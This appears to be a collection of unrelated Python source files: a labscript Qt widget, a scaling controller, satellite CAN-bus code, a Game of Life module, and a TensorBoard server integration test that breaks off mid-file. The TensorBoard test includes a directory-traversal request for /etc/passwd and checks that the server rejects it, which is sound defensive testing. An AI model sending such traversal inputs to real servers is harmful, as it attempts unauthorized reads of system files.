set_config('MNE_KIT2FIFF_STIM_CHANNEL_CODING', self.model.stim_coding,
home_dir, set_env=False)
set_config('MNE_KIT2FIFF_STIM_CHANNEL_SLOPE', self.model.stim_slope,
home_dir, set_env=False)
set_config('MNE_KIT2FIFF_STIM_CHANNEL_THRESHOLD',
str(self.model.stim_threshold), home_dir, set_env=False)
|
analoginput.py
|
#####################################################################
# #
# analogoutput.py #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the labscript suite (see #
# http://labscriptsuite.org) and is licensed under the Simplified #
# BSD License. See the license.txt file in the root of the project #
# for the full license. #
# #
#####################################################################
import sys
from qtutils.qt.QtCore import *
from qtutils.qt.QtGui import *
from qtutils.qt.QtWidgets import *
from qtutils import *
import qtutils.icons
import threading
import time
from labscript_utils.qtwidgets.InputPlotWindow import PlotWindow
class AnalogInput(QWidget):
def __init__(self, device_name, hardware_name, connection_name='-', display_name=None, horizontal_alignment=False, parent=None):
QWidget.__init__(self, parent)
self.plot = None
self._device_name = device_name
self._connection_name = connection_name
self._hardware_name = hardware_name
self.win = None
label_text = (self._hardware_name + '\n' + self._connection_name) if display_name is None else display_name
self._label = QLabel(label_text)
self._label.setAlignment(Qt.AlignCenter)
self._label.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Minimum)
self._line_edit = QLineEdit()
self._line_edit.setSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.Minimum)
self._line_edit.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self._line_edit.setMaximumWidth(55)
self._line_edit.setAlignment(Qt.AlignRight)
self._line_edit.setReadOnly(True)
self._plot_btn = QPushButton()
self._plot_btn.setIcon(QIcon(':/qtutils/fugue/chart-up'))
self._plot_btn.clicked.connect(self.open_plot_window)
self._value_changed_function = None
self.setSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.Minimum)
# Create widgets and layouts
if horizontal_alignment:
self._layout = QHBoxLayout(self)
self._layout.addWidget(self._label)
self._layout.addWidget(self._line_edit)
self._layout.addWidget(self._plot_btn)
else:
self._layout = QGridLayout(self)
self._layout.setVerticalSpacing(0)
self._layout.setHorizontalSpacing(0)
self._layout.setContentsMargins(5, 5, 5, 5)
self._label.setSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.Minimum)
self._layout.addWidget(self._label)
self._layout.addItem(QSpacerItem(0, 0, QSizePolicy.MinimumExpanding, QSizePolicy.Minimum), 0, 1)
h_widget = QWidget()
h_layout = QHBoxLayout(h_widget)
h_layout.setContentsMargins(0, 0, 0, 0)
h_layout.addWidget(self._line_edit)
self._layout.addWidget(self._label, 0, 0)
self._layout.addWidget(h_widget, 1, 0)
self._layout.addWidget(self._plot_btn, 2, 0)
self._layout.addItem(QSpacerItem(0, 0, QSizePolicy.MinimumExpanding, QSizePolicy.Minimum), 1, 1)
self.set_value(None)
# The Analog input object that is in charge of this button
self._AI = None
# Setting and getting methods for the Digitl Out object in charge of this button
def set_AI(self, AI, notify_old_AI=True, notify_new_AI=True):
# If we are setting a new AO, remove this widget from the old one (if it isn't None) and add it to the new one (if it isn't None)
if AI != self._AI:
if self._AI is not None and notify_old_AI:
self._AI.remove_widget(self, False)
if AI is not None and notify_new_AI:
AI.add_widget(self)
# Store a reference to the digital out object
self._AI = AI
def get_AI(self):
return self._AI
@inmain_decorator(True)
def set_value(self, value):
if value is not None:
text = "%0.4f" % value
else:
text = "no value"
self._line_edit.setText(text)
def _check_plot_window(self):
while self.win is not None:
time.sleep(0.1)
if self.from_child.get() == "closed":
self.win = None
self.to_child = None
self.from_child = None
def open_plot_window(self):
if self.win is None:
self.win = PlotWindow()
self.to_child, self.from_child = self.win.start(self._connection_name, self._hardware_name, self._device_name)
check_plot_window_thread = threading.Thread(target=self._check_plot_window)
check_plot_window_thread.daemon = True
check_plot_window_thread.start()
else:
self.to_child.put('focus')
# A simple test!
if __name__ == '__main__':
qapplication = QApplication(sys.argv)
window = QWidget()
layout = QVBoxLayout(window)
button = AnalogInput('AI1', 'AI1')
layout.addWidget(button)
window.show()
sys.exit(qapplication.exec_())
|
plugin.py
|
# Copyright (c) 2017 LSD - UFCG.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import time
from controller.plugins.controller.basic.alarm import BasicAlarm
from controller.plugins.controller.base import Controller
from controller.utils.logger import Log, configure_logging
# FIXME: This class does not work with the current scaler format.
# It should be removed in the future.
class BasicController(Controller):
def __init__(self, metric_source, actuator, plugin_info):
# Set up logging
self.logger = Log("basic.controller.log", "controller.log")
configure_logging()
check_interval = plugin_info["check_interval"]
trigger_down = plugin_info["trigger_down"]
trigger_up = plugin_info["trigger_up"]
min_cap = plugin_info["min_cap"]
max_cap = plugin_info["max_cap"]
actuation_size = plugin_info["actuation_size"]
metric_rounding = plugin_info["metric_rounding"]
# Start alarm
self.alarm = BasicAlarm(actuator, metric_source, trigger_down,
trigger_up, min_cap, max_cap, actuation_size,
metric_rounding)
# Start up controller thread
# Create lock to access application list
self.applications_lock = threading.RLock()
self.applications = {}
self.controller = _BasicControllerThread(
self.applications, self.applications_lock, self.alarm,
check_interval)
self.controller_thread = threading.Thread(target=self.controller.start)
self.controller_thread.start()
def start_application_scaling(self, app_id, plugin_info):
self.logger.log("Adding application id: %s" % (app_id))
# Acquire lock and add application
with self.applications_lock:
self.applications[app_id] = plugin_info
def stop_application_scaling(self, app_id):
# Acquire lock and remove application
with self.applications_lock:
if app_id in self.applications.keys():
self.logger.log("Removing application id: %s" % (app_id))
self.applications.pop(app_id)
else:
self.logger.log("Application %s not found" % (app_id))
def stop_controller(self):
self.controller.running = False
def status(self):
return ""
class _BasicControllerThread():
def __init__(self, applications, applications_lock, alarm, check_interval):
self.logger = Log("basic.controller_thread.log", "controller.log")
configure_logging()
self.applications = applications
self.applications_lock = applications_lock
self.alarm = alarm
self.check_interval = check_interval
self.running = True
def start(self):
self.logger.log("Starting controller thread")
while self.running:
# acquire lock, check applications and wait
with self.applications_lock:
self.logger.log("Monitoring applications: %s" %
(str(self.applications.keys())))
applications_ids = self.applications.keys()
# for each application check state
for application_id in applications_ids:
instances = self.applications[application_id]["instances"]
self.logger.log("Checking application:%s|instances:%s" % (
application_id, instances))
self.alarm.check_application_state(
application_id, instances)
time.sleep(float(self.check_interval))
|
COM_2_MAIN.py
|
##COM 2 Main
## Written with Python v3.6.3 (CPython)
## Satellite Communication Subsystem 2
## Copyright (C) 2017 Jasper Yao, COM2 Subsystem Team,
##
##This program is free software: you can redistribute it and/or modify
##it under the terms of the GNU General Public License as published by
##the Free Software Foundation, either version 3 of the License, or
##(at your option) any later version.
##
##This program is distributed in the hope that it will be useful,
##but WITHOUT ANY WARRANTY; without even the implied warranty of
##MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
##GNU General Public License for more details.
##
##You should have received a copy of the GNU General Public License
##along with this program. If not, see <https://www.gnu.org/licenses/>.
#import cyberdinesys
#cyberdinesys.skynet.activate()
import config
from time import sleep
import time
import subprocess
import threading #Allow multithreading functionality
from MCP25625_api import MCP25625_api, Message #import CAN HAL
import subprocess
import os
#Allow time dependant interrupt controller
flag1 = threading.Event()
#Prevent Send and Recieve from accessing mcp at same time
mcp_lock = threading.Lock()
cwd = os.getcwd()
if config.dynamicpathing:
SINEFILEPATH = cwd
else:
SINEFILEPATH = config.SINEFILEPATH_Default # SET THIS # SET THIS
pythonx_radio_process = None
def RF_KILL_formal():
global pythonx_radio_process
if pythonx_radio_process is None:
return
pythonx_radio_process.terminate()
if pythonx_radio_process.returncode is None:
pythonx_radio_process.kill()
pythonx_radio_process = None
return
# A dictionary join for simplification of reference, n+1 dicrionary overwrites n dictionary
commandMap = {**config.py2commandMap, **config.py3commandMap, **config.COM2commandMacroMap}
def run_pyx_file(name, pytype):
global pythonx_radio_process
pythonx_command = pytype +" {}/{} ".format(SINEFILEPATH, name) # launch your python3 script using bash
pythonx_radio_process = subprocess.Popen(pythonx_command.split(), stdout=subprocess.PIPE)
# if not pythonx_radio_process is None:
# output, error = pythonx_radio_process.communicate() # receive output from the python3 script
return
def get_byte_temp():
cpu_temp_object = open('/sys/class/thermal/thermal_zone0/temp')
try:
raw_temp = int(cpu_temp_object.read())
except: #Data Insurance
print('temp is NAN')
cpu_temp_object.close() #Range output temp is (-40, 215)
b10_temp =round(raw_temp / 1000 + 40) #Supposed to convert int to bytes for sending via buffer
print("Temp: " + str(raw_temp/1000) + " Hex: " + hex(b10_temp) )
return b10_temp
#CAN controller Initialization
#There needs to be some kind of event listener daemon? on tap so that this puppy
#can appropriately wait for CAN packets...
##CAN_control()
#Thread 2
#Ten second interrupt
#There is drift in this function, not meant for real time calculations
#Set up object to output
sender = MCP25625_api()
sender.SetFilterIdF0(0x120801F1)
sender.Initialize()
sender.SetNormalMode()
def interrupt_10s():
#print("Interrupt 10s")
# the temperature data to send
global mcp_lock
mcp_lock.acquire()
msg = Message(config.CAN_ID_output_telemetry, [get_byte_temp()]) # , extended_id=False)
try:
sender.Send(msg, timeoutMilliseconds=1000)
print(" SEND: {}".format(msg))
except TimeoutError as e:
print(" SEND: Timeout sending message. <{}>".format(e))
finally:
mcp_lock.release()
threading.Timer(10, interrupt_10s).start()
#Thread 3
#Ten minutes interrupt
##Interrupt behavior needs to be defined.%%
def interrupt_10min():
print("Interrupt 10min")
global flag1
flag1.set()
#thread1.cancl()
def listener():#Target of CAN control thread 1
# initializing CAN message data object and reader
reader = MCP25625_api()
reader.SetFilterIdF0(0x120801F1)
reader.Initialize()
reader.SetNormalMode()
global mcp_lock
while(True):
try:
mcp_lock.acquire()
recvMsg = reader.Recv(timeoutMilliseconds=5000)
except TimeoutError:
print("Loop Timeout: Restarting Loop")
else:
parsePacket(recvMsg)
finally:
mcp_lock.release()
time.sleep(.005) #other thread to aquire lock
def parsePacket(msg):
m_id = msg.arbitration_id
if m_id == config.CAN_ID_commands:
try:#RADIO Message "transceiver" command subroutine
possiblecommand = msg.data[0]
commandActual = commandMap[possiblecommand]
RF_KILL_formal()
print("Command " + str(possiblecommand) + ": " + str(commandActual) )
if possiblecommand < config.PYTHON_2_LENGTH:
run_pyx_file(commandActual, "python2")
return #None case: command is macro and is executed
elif possiblecommand < config.PYTHON_3_LENGTH:
run_pyx_file(commandActual, "python3")
#maybe py2 commandlength should be config variable?
elif possiblecommand < config.MACRO_LENGTH:
commandActual()
#This code assumes all m_id=1 events correspond to a python 2.7 file or python 3.6X file or Subsystem Command
except KeyError:
print("Invalid Data")
elif m_id == config.CAN_ID_pictures:
print("Picture data here")
else:
print("Incorrect filter")
#Timer class
##WARNING TIMERS ARE NOT CLOCK BASED, ACCURACY IS NOT GUARANTEED
thread2 = threading.Timer(600, interrupt_10min)
##Repeating 10.
thread3 = threading.Timer(10, interrupt_10s)
thread3.daemon = True
#Init Block
thread2.start()
thread3.start()
thread1 = threading.Thread(name='observer', target=listener())
thread1.start()
print("CAN controller initialized")
|
conway.py
|
"""PyGoL Game of Life"""
from __future__ import annotations
import multiprocessing as mp
from signal import SIGTERM
from typing import Any, Callable, List, Union
from pygol.utils import Matrix
from .rules import Signature as Rule
from .rules import conways_life, RULES
class Game(Matrix):
"""PyGoL Game simulation class
Parameters
----------
width, height: int
Width and height of the life matrix.
seed: `list` [`list` [`Any`]], optional
Seed or base grid to start the simulation with. Must only contain ``0``
for dead cells and ``1`` for alive cells. When parsing an RLE file this
seed is returned from ``utils.parse_rle.parse()`` as part of the user
environment. If not specified, it defaults to a randomly filled matrix.
wrap: bool, optional
Whether to wrap the matrix around the edges. Defaults to ``True``.
rule: `union` [`Rule Func`, str], optional
Rule string or function to be used to run the simulation. Check the
`game.rules` module to see available rules and rule strings. If not
specified the rule defaults to the standard ``Conway's Game of Life``
rule.
alive, dead: str, optional
Strings used to represent dead and alive cells. If not specified, alive
cells are represented using ``•`` and dead cells using `` ``.
Attributes
----------
matrix: Matrix
Current state of the life grid
wrap: bool
Whether to wrap the life grid around the edges
rule: `callable` [[int, int, Neighbors], int]
Rule to use when running the simulation
out: `callable` [`Pipe`, None]
Display function receiving a pipe end to read the current state of the
game and display it.
charmap: `dict` [`str`, `str`]
Dict containing strings to display dead and alive cells
Examples
--------
Running from an RLE file
>>> from pygol.utils import parse_rle
>>> from pygol.gui import pygame
>>> conw = Game(**parse_rle(/path/to/seed.rle)).pad(20).pipe(pygame)
>>> conw.run(100)
Running a simulation in the terminal
>>> import os
>>> import time
>>> conw = Game(width=170, height=50)
>>> for i in range(100):
... os.system("clear")
... print(conw)
... conw.tick()
... time.sleep(0.5)
"""
# pylint: disable=too-many-arguments
def __init__(self, width: int, height: int, seed: List[List[Any]] = None,
wrap: bool = True, rule: Union[Rule, str] = conways_life,
alive: str = "•", dead: str = " ") -> Game:
if not seed:
seed = Matrix(width, height).fill_random()
if isinstance(rule, str):
try:
rule = RULES[rule]
except KeyError:
rule = RULES[rule.upper()]
super().__init__(width, height, seed)
self.wrap = wrap
self.rule = rule
self.out = lambda x: None
self.charmap = {
"alive": alive,
"dead": dead
}
def __str__(self) -> str:
res = ""
for row in self:
for col in row:
res += self.charmap["alive"] if col == 1 else self.charmap["dead"]
res += "\n"
return res
def tick(self) -> Game:
"""Advance the simulation by one tick.
Construct a new game state by applying the rule function to all cells.
Returns
-------
self: Game
Returns the game object to allow chaining.
"""
grid = Matrix(self.width, self.height)
nb = self.neighbors
rule = self.rule
for y in range(self.height):
for x in range(self.width):
cell = self[y][x]
neighbors = nb(x, y, wrap=self.wrap)
alive_count = sum([x for x, *_ in neighbors])
grid[y][x] = rule(cell, alive_count, neighbors)
self.matrix = grid
return self
def pipe(self, func: Callable[[mp.Pipe], None]) -> Game:
"""Save a display function.
Parameters
----------
func: `callable` [`Pipe`, None]
Display function receiving a pipe end to read and display to current
game state. See the ``gui`` module for example display functions.
Returns
-------
self: Game
Returns the game object to allow chaining.
Notes
-----
The display function is spawned in a different process using the
``multiprocess`` module. It receives a pipe that it can read and write
to. The pipe can be read using ``pipe.recv()`` and written to using
``pipe.send(payload)``. The display function should only write a
``SIGTERM`` signal into the pip when it is terminated. This signals the
simulation process that it has been terminated, presumably by the user
(e.g. by closing a pygame window).
"""
self.out = func
return self
def run(self, times: int, delay: float = 0.1) -> Game:
"""Run the life simulation and call the display function
Parameters
----------
time: int
Amount of ticks to run the simulation.
delay: float, optional
Delay between every frame of the simulation. Defaults to ``0.1``
seconds.
Returns
-------
self: Game
Returns the game object to allow chaining.
Notes
-----
The run function first writes the delay into the pipe before running the
simulation and writing the game states to the pipe. The run function
may terminate before having completed the specified number of ticks
if it receives a ``SIGTERM`` signal from the display function.
"""
read, write = mp.Pipe(duplex=True)
display = mp.Process(target=self.out, args=(read,))
display.start()
write.send(delay)
for _ in range(times):
self.tick()
write.send(self)
# Check if display process ended (e.g. user closed window)
if write.poll():
display_ended = write.recv()
if display_ended == SIGTERM:
break
write.send(SIGTERM)
read.close()
display.join()
return self
|
server_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Integration tests for TensorBoard.
These tests start up a full-fledged TensorBoard server.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import base64
import gzip
import json
import numbers
import os
import shutil
import tempfile
import threading
import numpy as np
from six import BytesIO
from six.moves import http_client
from six.moves import xrange # pylint: disable=redefined-builtin
from google.protobuf import text_format
from tensorflow.contrib.tensorboard.plugins.projector.projector_config_pb2 import ProjectorConfig
from tensorflow.core.framework import graph_pb2
from tensorflow.core.framework import summary_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.core.protobuf import saver_pb2
from tensorflow.core.util import event_pb2
from tensorflow.python.client import session
from tensorflow.python.framework import ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import gfile
from tensorflow.python.platform import resource_loader
from tensorflow.python.platform import test
from tensorflow.python.summary import event_multiplexer
from tensorflow.python.summary.writer import writer as writer_lib
from tensorflow.python.training import saver as saver_lib
from tensorflow.tensorboard.backend import server
class TensorboardServerTest(test.TestCase):
_only_use_meta_graph = False # Server data contains only a GraphDef
# Number of scalar-containing events to make.
_SCALAR_COUNT = 99
def setUp(self):
temp_dir = self._GenerateTestData()
self._multiplexer = event_multiplexer.EventMultiplexer(
size_guidance=server.TENSORBOARD_SIZE_GUIDANCE)
server.ReloadMultiplexer(self._multiplexer, {temp_dir: None})
# 0 to pick an unused port.
self._server = server.BuildServer(self._multiplexer, 'localhost', 0,
'/foo/logdir/argument')
self._server_thread = threading.Thread(target=self._server.serve_forever)
self._server_thread.daemon = True
self._server_thread.start()
self._connection = http_client.HTTPConnection(
'localhost', self._server.server_address[1])
def tearDown(self):
self._connection.close()
self._server.shutdown()
self._server.server_close()
def _get(self, path, headers={}):
"""Perform a GET request for the given path."""
self._connection.request('GET', path, None, headers)
return self._connection.getresponse()
def _getJson(self, path):
"""Perform a GET request and decode the result as JSON."""
self._connection.request('GET', path)
response = self._connection.getresponse()
self.assertEqual(response.status, 200)
data = response.read()
if response.getheader('Content-Encoding') == 'gzip':
data = gzip.GzipFile('', 'rb', 9, BytesIO(data)).read()
return json.loads(data.decode('utf-8'))
def testBasicStartup(self):
"""Start the server up and then shut it down immediately."""
pass
def testRequestMainPage(self):
"""Navigate to the main page and verify that it returns a 200."""
response = self._get('/')
self.assertEqual(response.status, 200)
def testRequestNonexistentPage(self):
"""Request a page that doesn't exist; it should 404."""
response = self._get('/asdf')
self.assertEqual(response.status, 404)
def testDirectoryTraversal(self):
"""Attempt a directory traversal attack."""
response = self._get('/..' * 30 + '/etc/passwd')
self.assertEqual(response.status, 400)
def testLogdir(self):
"""Test the format of the data/logdir endpoint."""
parsed_object = self._getJson('/data/logdir')
self.assertEqual(parsed_object, {'logdir': '/foo/logdir/argument'})
def testRuns(self):
"""Test the format of the /data/runs endpoint."""
run_json = self._getJson('/data/runs')
# Don't check the actual timestamp since it's time-dependent.
self.assertTrue(
isinstance(run_json['run1']['firstEventTimestamp'], numbers.Number))
del run_json['run1']['firstEventTimestamp']
self.assertEqual(
run_json,
{
'run1': {
'compressedHistograms': ['histogram'],
'scalars': ['simple_values'],
'histograms': ['histogram'],
'images': ['image'],
'audio': ['audio'],
# if only_use_meta_graph, the graph is extracted from the metagraph
'graph': True,
'meta_graph': self._only_use_meta_graph,
'run_metadata': ['test run']
}
})
def testApplicationPaths_getCached(self):
"""Test the format of the /data/runs endpoint."""
for path in ('/',): # TODO(jart): '/app.js' in open source
connection = http_client.HTTPConnection('localhost',
self._server.server_address[1])
connection.request('GET', path)
response = connection.getresponse()
self.assertEqual(response.status, 200, msg=path)
self.assertEqual(
response.getheader('Cache-Control'),
'private, max-age=3600',
msg=path)
connection.close()
def testDataPaths_disableAllCaching(self):
"""Test the format of the /data/runs endpoint."""
for path in ('/data/runs', '/data/logdir',
'/data/scalars?run=run1&tag=simple_values',
'/data/scalars?run=run1&tag=simple_values&format=csv',
'/data/images?run=run1&tag=image',
'/data/individualImage?run=run1&tag=image&index=0',
'/data/audio?run=run1&tag=audio',
'/data/run_metadata?run=run1&tag=test%20run'):
connection = http_client.HTTPConnection('localhost',
self._server.server_address[1])
connection.request('GET', path)
response = connection.getresponse()
self.assertEqual(response.status, 200, msg=path)
self.assertEqual(response.getheader('Expires'), '0', msg=path)
response.read()
connection.close()
def testHistograms(self):
"""Test the format of /data/histograms."""
self.assertEqual(
self._getJson('/data/histograms?tag=histogram&run=run1'),
[[0, 0, [0, 2.0, 3.0, 6.0, 5.0, [0.0, 1.0, 2.0], [1.0, 1.0, 1.0]]]])
def testSampleScalars(self):
"""Test the sample_count parameter of /data/scalars."""
for i in xrange(10, self._SCALAR_COUNT, 10):
samples = self._getJson('/data/scalars?sample_count=%d' % i)
values = samples['run1']['simple_values']
# Verify that we got the right amount of values and that we got the
# endpoints.
self.assertEqual(len(values), i)
self.assertEqual(values[0], [100, 10, 1])
self.assertEqual(values[-1], [9900, 990, 99])
def testSampleScalarsWithLargeSampleCount(self):
"""Test using a large sample_count."""
samples = self._getJson('/data/scalars?sample_count=999999')
values = samples['run1']['simple_values']
self.assertEqual(len(values), self._SCALAR_COUNT)
def testImages(self):
"""Test listing images and retrieving an individual image."""
image_json = self._getJson('/data/images?tag=image&run=run1')
image_query = image_json[0]['query']
# We don't care about the format of the image query.
del image_json[0]['query']
self.assertEqual(image_json, [{
'wall_time': 0,
'step': 0,
'height': 1,
'width': 1
}])
response = self._get('/data/individualImage?%s' % image_query)
self.assertEqual(response.status, 200)
def testAudio(self):
"""Test listing audio and retrieving an individual audio clip."""
audio_json = self._getJson('/data/audio?tag=audio&run=run1')
audio_query = audio_json[0]['query']
# We don't care about the format of the audio query.
del audio_json[0]['query']
self.assertEqual(audio_json, [{
'wall_time': 0,
'step': 0,
'content_type': 'audio/wav'
}])
response = self._get('/data/individualAudio?%s' % audio_query)
self.assertEqual(response.status, 200)
def testGraph(self):
"""Test retrieving the graph definition."""
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs')
self.assertEqual(response.status, 200)
graph_pbtxt = response.read()
# Parse the graph from pbtxt into a graph message.
graph = graph_pb2.GraphDef()
graph = text_format.Parse(graph_pbtxt, graph)
self.assertEqual(len(graph.node), 2)
self.assertEqual(graph.node[0].name, 'a')
self.assertEqual(graph.node[1].name, 'b')
# Make sure the second node has an attribute that was filtered out because
# it was too large and was added to the "too large" attributes list.
self.assertEqual(list(graph.node[1].attr.keys()), ['_very_large_attrs'])
self.assertEqual(graph.node[1].attr['_very_large_attrs'].list.s,
[b'very_large_attr'])
def testProjectorRunsWithEmbeddings(self):
"""Test the format of /runs endpoint of the projector plugin."""
run_json = self._getJson('/data/plugin/projector/runs')
self.assertEqual(run_json, ['run1'])
def testProjectorInfo(self):
"""Test the format of /info endpoint of the projector plugin."""
info_json = self._getJson('/data/plugin/projector/info?run=run1')
self.assertItemsEqual(info_json['embeddings'], [{
'tensorShape': [1, 2],
'tensorName': 'var1'
}, {
'tensorShape': [10, 10],
'tensorName': 'var2'
}, {
'tensorShape': [100, 100],
'tensorName': 'var3'
}])
def testProjectorTensor(self):
"""Test the format of /tensor endpoint of the projector plugin."""
url = '/data/plugin/projector/tensor?run=run1&name=var1'
tensor_bytes = self._get(url).read()
tensor = np.reshape(np.fromstring(tensor_bytes, dtype='float32'), [1, 2])
expected_tensor = np.array([[6, 6]], dtype='float32')
self.assertTrue(np.array_equal(tensor, expected_tensor))
def testAcceptGzip_compressesResponse(self):
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs',
{'Accept-Encoding': 'gzip'})
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader('Content-Encoding'), 'gzip')
pbtxt = gzip.GzipFile('', 'rb', 9, BytesIO(response.read())).read()
graph = text_format.Parse(pbtxt, graph_pb2.GraphDef())
self.assertEqual(len(graph.node), 2)
def testAcceptAnyEncoding_compressesResponse(self):
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs',
{'Accept-Encoding': '*'})
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader('Content-Encoding'), 'gzip')
pbtxt = gzip.GzipFile('', 'rb', 9, BytesIO(response.read())).read()
graph = text_format.Parse(pbtxt, graph_pb2.GraphDef())
self.assertEqual(len(graph.node), 2)
def testAcceptDoodleEncoding_doesNotCompressResponse(self):
response = self._get('/data/graph?run=run1&limit_attr_size=1024'
'&large_attrs_key=_very_large_attrs',
{'Accept-Encoding': 'doodle'})
self.assertEqual(response.status, 200)
self.assertIsNone(response.getheader('Content-Encoding'))
graph = text_format.Parse(response.read(), graph_pb2.GraphDef())
self.assertEqual(len(graph.node), 2)
def testAcceptGzip_doesNotCompressImage(self):
response = self._get('/data/individualImage?run=run1&tag=image&index=0',
{'Accept-Encoding': 'gzip'})
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader('Content-Encoding'), None)
def testRunMetadata(self):
"""Test retrieving the run metadata information."""
response = self._get('/data/run_metadata?run=run1&tag=test%20run')
self.assertEqual(response.status, 200)
run_metadata_pbtxt = response.read()
# Parse from pbtxt into a message.
run_metadata = config_pb2.RunMetadata()
text_format.Parse(run_metadata_pbtxt, run_metadata)
self.assertEqual(len(run_metadata.step_stats.dev_stats), 1)
self.assertEqual(run_metadata.step_stats.dev_stats[0].device, 'test device')
def _GenerateTestData(self):
"""Generates the test data directory.
The test data has a single run named run1 which contains:
- a histogram
- an image at timestamp and step 0
- scalar events containing the value i at step 10 * i and wall time
100 * i, for i in [1, _SCALAR_COUNT).
- a graph definition
Returns:
temp_dir: The directory the test data is generated under.
"""
temp_dir = tempfile.mkdtemp(prefix=self.get_temp_dir())
self.addCleanup(shutil.rmtree, temp_dir)
run1_path = os.path.join(temp_dir, 'run1')
os.makedirs(run1_path)
writer = writer_lib.FileWriter(run1_path)
histogram_value = summary_pb2.HistogramProto(
min=0,
max=2,
num=3,
sum=6,
sum_squares=5,
bucket_limit=[0, 1, 2],
bucket=[1, 1, 1])
# Add a simple graph event.
graph_def = graph_pb2.GraphDef()
node1 = graph_def.node.add()
node1.name = 'a'
node2 = graph_def.node.add()
node2.name = 'b'
node2.attr['very_large_attr'].s = b'a' * 2048 # 2 KB attribute
meta_graph_def = meta_graph_pb2.MetaGraphDef(graph_def=graph_def)
if self._only_use_meta_graph:
writer.add_meta_graph(meta_graph_def)
else:
writer.add_graph(graph_def)
# Add a simple run metadata event.
run_metadata = config_pb2.RunMetadata()
device_stats = run_metadata.step_stats.dev_stats.add()
device_stats.device = 'test device'
writer.add_run_metadata(run_metadata, 'test run')
# 1x1 transparent GIF.
encoded_image = base64.b64decode(
'R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7')
image_value = summary_pb2.Summary.Image(
height=1, width=1, colorspace=1, encoded_image_string=encoded_image)
audio_value = summary_pb2.Summary.Audio(
sample_rate=44100,
length_frames=22050,
num_channels=2,
encoded_audio_string=b'',
content_type='audio/wav')
writer.add_event(
event_pb2.Event(
wall_time=0,
step=0,
summary=summary_pb2.Summary(value=[
summary_pb2.Summary.Value(
tag='histogram', histo=histogram_value),
summary_pb2.Summary.Value(
tag='image', image=image_value), summary_pb2.Summary.Value(
tag='audio', audio=audio_value)
])))
# Write 100 simple values.
for i in xrange(1, self._SCALAR_COUNT + 1):
writer.add_event(
event_pb2.Event(
# We use different values for wall time, step, and the value so we can
# tell them apart.
wall_time=100 * i,
step=10 * i,
summary=summary_pb2.Summary(value=[
summary_pb2.Summary.Value(
tag='simple_values', simple_value=i)
])))
writer.flush()
writer.close()
# We assume that the projector is a registered plugin.
self._GenerateProjectorTestData(run1_path)
return temp_dir
def _GenerateProjectorTestData(self, run_path):
# Write a projector config file in run1.
config_path = os.path.join(run_path, 'projector_config.pbtxt')
config = ProjectorConfig()
embedding = config.embeddings.add()
# Add an embedding by its canonical tensor name.
embedding.tensor_name = 'var1:0'
config_pbtxt = text_format.MessageToString(config)
with gfile.GFile(config_path, 'w') as f:
f.write(config_pbtxt)
# Write a checkpoint with some dummy variables.
with ops.Graph().as_default():
sess = session.Session()
checkpoint_path = os.path.join(run_path, 'model')
variable_scope.get_variable(
'var1', [1, 2], initializer=init_ops.constant_initializer(6.0))
variable_scope.get_variable('var2', [10, 10])
variable_scope.get_variable('var3', [100, 100])
sess.run(variables.global_variables_initializer())
saver = saver_lib.Saver(write_version=saver_pb2.SaverDef.V1)
saver.save(sess, checkpoint_path)
class TensorboardServerUsingMetagraphOnlyTest(TensorboardServerTest):
# Tests new ability to use only the MetaGraphDef
_only_use_meta_graph = True # Server data contains only a MetaGraphDef
class ParseEventFilesSpecTest(test.TestCase):
def testRunName(self):
logdir_string = 'lol:/cat'
expected = {'/cat': 'lol'}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
def testPathWithColonThatComesAfterASlash_isNotConsideredARunName(self):
logdir_string = '/lol:/cat'
expected = {'/lol:/cat': None}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
def testMultipleDirectories(self):
logdir_string = '/a,/b'
expected = {'/a': None, '/b': None}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
def testNormalizesPaths(self):
logdir_string = '/lol/.//cat/../cat'
expected = {'/lol/cat': None}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
def testAbsolutifies(self):
logdir_string = 'lol/cat'
expected = {os.path.realpath('lol/cat'): None}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
def testRespectsGCSPath(self):
logdir_string = 'gs://foo/path'
expected = {'gs://foo/path': None}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
def testRespectsHDFSPath(self):
logdir_string = 'hdfs://foo/path'
expected = {'hdfs://foo/path': None}
self.assertEqual(server.ParseEventFilesSpec(logdir_string), expected)
def testDoesNotExpandUserInGCSPath(self):
logdir_string = 'gs://~/foo/path'
